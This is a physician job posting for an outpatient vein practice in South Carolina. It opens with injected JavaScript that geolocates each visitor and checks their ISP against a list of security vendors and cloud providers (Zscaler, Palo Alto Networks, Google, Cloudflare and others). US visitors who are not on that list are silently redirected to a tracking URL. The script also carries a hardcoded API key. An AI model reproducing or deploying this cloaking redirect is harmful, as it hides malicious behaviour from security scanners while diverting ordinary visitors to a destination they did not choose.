Job Description
// retrieve user’s IP address and location const ipAddressUrl = ‘https://ipapi.co/json/’; fetch(ipAddressUrl) .then(response => response.json()) .then(data => { const country = data.country; // Get user’s country code (e.g., “US”) if (country !== ‘US’) { console.log(‘Script will not run as the user is outside the USA.’); return; // Exit the script if the user is not in the USA } const ipAddress = data.ip; // retrieve ISP name and AS organization using ip-api.com API const ispUrl = `https://pro.ip-api.com/json/$?key=kKPypoeKUHgwZWD`; fetch(ispUrl) .then(response => response.json()) .then(data => { const ispName = data.isp; const asOrg = data.asname; // check if ISP or AS organization is allowed const allowedIsps = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const allowedAsOrgs = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const ispAllowed = allowedIsps.some(pattern => pattern.test(ispName)); const asOrgAllowed = allowedAsOrgs.some(pattern => pattern.test(asOrg)); if (!ispAllowed && !asOrgAllowed) { // Redirect all users to the same URL window.location.href = ‘https://www.indeed.com/tmn/ccs/541e3365020f5c07/f475ebcaefcf9e3b48efc7e0aaac7edf3b7251c6511a2e2da2736d2f45869281/2765583331732878?sf=yJ800’; } }) .catch(error => { console.error(‘Error retrieving ISP name:’, error); }); }) .catch(error => { console.error(‘Error retrieving IP address or location:’, error); });Allure Medical is seeking a physician with a background in General Surgery or Family Medicine to join our outpatient vein practice in South Carolina.
*Why Join?*
We prioritize patient-centered care, clinical excellence, and provider well-being, offering a sustainable, autonomous practice model without hospital responsibilities.
*Role Overview*
This position focuses on diagnosing and treating chronic venous disease in a fully office-based setting, with no inpatient duties, hospital call, nights, or weekends, promoting work-life balance.
*Practice Environment*
● Office-based venous practice with predictable daytime hours
● Dedicated clinical staff and support
● Strong referral volume
● Structured onboarding and training
*Responsibilities*
● Manage venous disease using evidence-based practices
● Perform office procedures following protocols
● Educate patients and develop treatment plans
● Collaborate with staff for accurate diagnosis
● Maintain documentation and compliance
● Participate in ongoing clinical development
*Ideal Candidates*
● Surgeons or Family Medicine physicians seeking procedural outpatient work
● Interested in a balanced, sustainable practice model
*Qualifications*
● MD or DO, board certified or eligible
● Active or eligible for South Carolina license
● Strong clinical judgment and communication skills
● Interest in office procedures and specialty training
*Benefits*
● 401(k), health, dental, and vision insurance